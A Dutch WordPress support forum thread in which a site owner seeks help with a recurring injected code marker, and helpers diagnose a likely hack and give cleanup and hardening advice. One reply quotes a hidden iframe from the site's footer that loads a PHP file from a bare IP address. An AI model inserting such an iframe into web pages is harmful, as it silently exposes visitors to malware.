Ondersteuning » Installatie WordPress » Probleem: #0f2490# if(empty($de)) {$de = "";echo $de;}

  • Beste,

    Ik zit met mn handen in het haar.
    Een maand geleden een wordpressje geinstalleerd, theme erop (Imag Mag) en dat ging allemaal prima.

    Verkeer begon lekker te groeien etc, maar nu ineens had ik dit onderaan mn page staan (en in mn WP dashboard)

    #0f2490# if(empty($de)) {$de = “”;echo $de;} #/0f2490# #0f2490# if(empty($de)) {$de = “”;echo $de;} #/0f2490#

    Nu kan ik niet vinden wat dit is, maar het klooit wel met mn site en het moet gewoon weg!

    Door pure ergenis heb ik een dump gemaakt van mn posts & plaatjes en daar gaat dus ook al veel werk in zitten om het weer netjes te krijgen…

    Daarna had ik wordpress eraf gegooid en 3.5.1 er opnieuw op gezet en ook Imag Mag.
    Dat was gisteren en toen leek alles weer opgelost te zijn.

    Nu log ik weer in, en wat zie ik:

    #0f2490# if(empty($de)) {$de = “”;echo $de;} #/0f2490# #0f2490# if(empty($de)) {$de = “”;echo $de;} #/0f2490#

    Wat is dit? (google maakt mij niet veel wijzer)
    Ik heb een x aantal plugins geinstalleerd, maar eigenlijk de meest voornaamste, dus geen rare rommel, want zoveel heb ik niet nodig.

    Graag advies/hulp.

    Rein

13 reacties aan het bekijken - 1 tot 13 (van in totaal 13)
  • Thread starter rijnooit

    (@rijnooit)

    Excuses, de website:

    caferacersunited.com

    Verwijder WordPress opnieuw en upload een schone nieuwe versie van 3.6
    anders zit er waarschijnlijk iets in je index.php of footer.php van je thema

    Thread starter rijnooit

    (@rijnooit)

    Richard,

    Ik heb een vermoeden dat het juist in die 3.6 zit (icm de plugins).

    Daarom gisteren een downgrade geprobeerd (ook alle plugins op deactivated gezet).

    Downgrade in de zin van: Via Filezilla, alles (op wp-content na) van 3.6 vervangen door 5.3.1.

    Dat ging zoals het moest, maar dat lijntje “code” blijft er maar.

    Ben idd bang dat ik WEER mn hele wordpress eraf moet gooien, wat echt idioot is. Maar dan liever 5.3.1

    Deze plugins heb ik trouwens:

    [IMG]http://i42.tinypic.com/ej8zkk.jpg[/IMG]
    http://tinypic.com/r/ej8zkk/5

    Heb ook nog een vermoeden dat het kan komen (ooit) door een W3 cache plugin… Maar goed die moet al weg zijn gegaan toen ik wordpress er opnieuw op gooide…

    Ik dacht even dat die code achter de # gewoon een hexcode was (een kleur), maar toen ik het stukje #0f2490# zocht, kreeg ik een hele riedel websites die hetzelfde probleem hebben en mijn browser geeft bij allemaal een script-waarschuwing en weigert ze te openen. Ik denk dat je probleem groter is dan een upgrade:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    het probleem deed zich ruim voor WP 3.6 al voor.

    Aangezien je WP al een paar keer hebt verwijderd, komt de code dus uit een van je plugins, je thema of je database. Wat je zou kunnen proberen is je thema en plugins naar je computer halen en met zoeken in bestanden kijken of je bijvoorbeeld die #of2490# kunt vinden. Sowieso eens serieus kijken of je inderdaad geen slachtoffer bent van een hack.

    Thread starter rijnooit

    (@rijnooit)

    Roy,

    Ik heb idd ook al wat van dat soort dingen gelezen…

    – Qua Plugins; ik heb er toch vrij normale op staan?
    – Qua Theme, tja, het is een gratis theme, dus wellicht ook een simpele code (geen idee hoor)
    – Qua database… Kan ik die niet gewoon geheeld leeg maken? (Alles is nu toch zo goed als leeg/kapot, dus vanaf scratch beginnen is nu toch nodig.

    Waar ik geen behoefde aan heb is, alles opnieuw en dan wéér dit gedoe.
    Heb er enigszins vrede mee dat alles opnieuw moet, maar als ik dat dan vrolijk heb gedaan en het dan weer gebeurd, pfff.

    * Ik maak ook eens een website hoor 🙁

    – Data base is trouwens ook al leeg gemaakt..

    Dan zou je zeggen dat het thema of de plugins de boel verklooien…

    Iedereen bedankt voor het meedenken!
    Het wordt enorm gewaardeerd 🙂

    Rein, als het inderdaad een hack is, dan heeft het geen zin om na te denken over de oorspronkelijke versies van je thema, plugins of je database. Wat ze namelijk proberen is om je website zo te manipuleren dat er reclame op komt te staan, je website doorverwijst naar iets van hen en bovendien, dat ze later makkelijk terug kunnen komen. Dit kan zijn door codes toe te voegen aan je thema of andere bestandjes, iets in je database te zetten of iets dergelijks. Zo’n “backdoor” raak je niet kwijt door alleen je WP bestanjes te vervangen. Als het in je thema of je database zit, is er namelijk niks opgeschoond. Als je mijn link leest (en alle verwijzigingen die er in staan), zul je zien dat het een hoop werk is om een hack kwijt te raken.

    Natuurlijk is ALLES verwijderen dè manier om rigoreus op te schonen, maar je database bevat natuurlijk je berichten en alles. Let trouwens op, stel dat er een “backdoor” in je database zit en je gebruikt een export of een backup van je oude database voor een nieuwe website, zit de “backdoor” er dus nog altijd in. Hetzelfde met je thema. Haal je het thema naar je computer, gooit alles van de server en je gebruikt hetzelfde thema en dat is aangepast, heb je het probleem nog altijd niet opgelost.

    Er zijn hack-scan-plugins beschikbaar, misschien kun je om te beginnen die je website eens laten scannen. Er zijn ook websites die dit kunnen trouwens.

    Verder, niet om je bang te maken, maar gewoon zodat je je er bewust van bent, als je website draait bij een host die de beveiliging niet op orde heeft, kun je als gebruiker vanalles doen om je website te beveiligen, maar dat zal weinig uithalen. Hetzelfde met een gehackte website die samen met die van jou op een ‘shared server’ staat. Als het probleem zich voor blijft doen, moet je ook eens met je host gaan praten.

    Handige lectuur verder:
    http://codex.wordpress.org/Hardening_WordPress

    http://sitecheck.sucuri.net/results/www.caferacersunited.com
    Dat is al veelbelovend. Sucuri vindt niks vervelends op je website. (Sucuri heeft trouwens een scan plugin.)

    http://scanurl.net/?u=http%3A%2F%2Fwww.caferacersunited.com+
    Scanurl ook niet.

    Thread starter rijnooit

    (@rijnooit)

    Hi Roy,

    Ik heb al even contact gehad met mn hosting en gevraagd of ze er echt alles vanaf kunnen gooien.

    Maar goed, als ik dit lees, is dat dus weer niet nodig.

    Ik begrijp goed dat ik op moet passen met het terugzetten van de de tekst en plaatjes.

    Ik heb alle teksten in een .docx staan (de code kant ervan) dus ansich moet ik daar wel netjes mn stukjes uit kunnen herschrijven… (toch?)

    Mn plaatjes zijn gewoon een map met jpegs geworden op mn pc. (Of kunnen die plaatjes ook besmet zijn?)

    Kortom, als alles er nu vanaf gehaald wordt, zou ik weinig verliezen van wat ik toch al kwijt ben…

    Die sucuri plugin heb ik idd op de site en die geeft ook niets geks aan… Vaag allemaal

    Met een beetje geluk is het gewoon een fout geplaatste code in je thema of een plugin die je steeds hergebruikt.
    Wat je zou kunnen doen, alles verwijderen. Nieuwe database aanmaken, WP installeren, de export van je berichten en zo weer inlezen en voor je plugins en thema’s gaat installeren kijken of het probleem terug komt. Is dat het geval, dan zit het probleem duidelijk in je export/database. Komt het probleem niet terug, dan zoek je alle plugins opnieuw (dus gebruik niet die op je computer), hetzelfde met het thema.

    Voor wat betreft je vragen:
    Tekst is geen probleem, maar het probleem van een XML export kan zijn dat je de foute codes mee exporteert en later weer importeert. Je teksten uit de XML halen en later weer als nieuwe berichten toevoegen in WP is de meest veilige weg.
    De extensie van plaatjes wordt nog wel eens gebruikt om iets anders te maskeren. Over het algmeen vallen die netpplaatjes wel op, want ze hebben een naam die jij zelf waarschijnlijk nooit zou gebruiken. Bovendien kun je je virusscanner van je computer een keer loslaten op de plaatjes op je computer voor je ze weer op de server zet.

    Thread starter rijnooit

    (@rijnooit)

    Ik heb het thema gewoon weer gedownload via wordpress, dus NIET van mn pc.
    Zo ook de plugins.

    Die moeten dus allemaal fris en fruitig zijn denk ik…

    Misschien dan toch maar de FTP- omgeving resetten, Imag Mag thema uploaden (vind deze gewoon erg mooi en gemakkelijk om mee te werken), en dan als eerste de securi plugin erop en even wat demo posts en plaatjes plaatsen en een paar dagen wachten?

    Heb wel een x-aantal plugins die ik graag wil installeren, maar dat moet dan maar even wachten???

    Qua teksten en plaatjes; Prima!

    Zo ga ik het idd doen.
    Netjes de stukjes tekst pakken, deze in een post plakken en daarna de plaatjes die nog allemaal netjes heb (idd met namen) zal ik na een virus scan (of 100) dan gewoon via “add media” per stuk/groep in de posts laden.

    Het valt natuurlijk niet uit te sluiten dat er een fout zit in het thema of een van de plugins die je wil gebruiken, zelfs als je ze van wp.org haalt, maar het zal een kwestie van proberen en geduld zijn om daar achter te komen. Als het normaal een dag duurt voor je de code terug hebt, moet je misschien een kale installatie maken, een paar dagen wachten; thema erop, een paar dagen wachten; één plugin, een paar dagen wachten; enz.
    Wel heel irritant. Hou in elk geval bij alles wat je doet in de gaten of er iets raars gebeurt. Na het maken van berichten, bij het toevoegen van plaatjes, op een bepaald moment zou je toch moeten ontdekken wat nu de oorzaak van de steeds terugkerende fout is.

    Sterkte…

    Thread starter rijnooit

    (@rijnooit)

    Ben bang dat ik het zo moet gaan aanpakken.

    Great! 🙁

    Bedankt voor het meedenken Roy!

    To be continued…. (hopelijk niet haha)

    Ik bezocht zojuist je website en tref er links onder in de footer een vierkant blokje aan.

    Als ik in de code kijk staat er dit:

    <p class="i09" id="i"><iframe src="http://87.106.237.52/kalendershop/bFzd4wRQ.php" style="position: absolute; height: 33px; width: 33px;"></iframe></p>

    dit lijkt mij niet goed?

    Het is vreemd dat je hier achter elkaar last van hebt.

    Inderdaad is de enige goede oplossing om grondig te zijn.

    – verwijder alle bestanden van de server (check ook eventueel verborgen .htaccess bestanden)
    – installeer een nieuw gedownloade versie van WordPress
    – download enkel themes en plugins van sites die je kan vertrouwen.

    Lees en pas deze tips toe: http://codex.wordpress.org/Hardening_WordPress

    Dan zou je hier een stuk minder kwetsbaar voor moeten zijn.

13 reacties aan het bekijken - 1 tot 13 (van in totaal 13)
  • Het onderwerp ‘Probleem: #0f2490# if(empty($de)) {$de = "";echo $de;}’ is gesloten voor nieuwe reacties.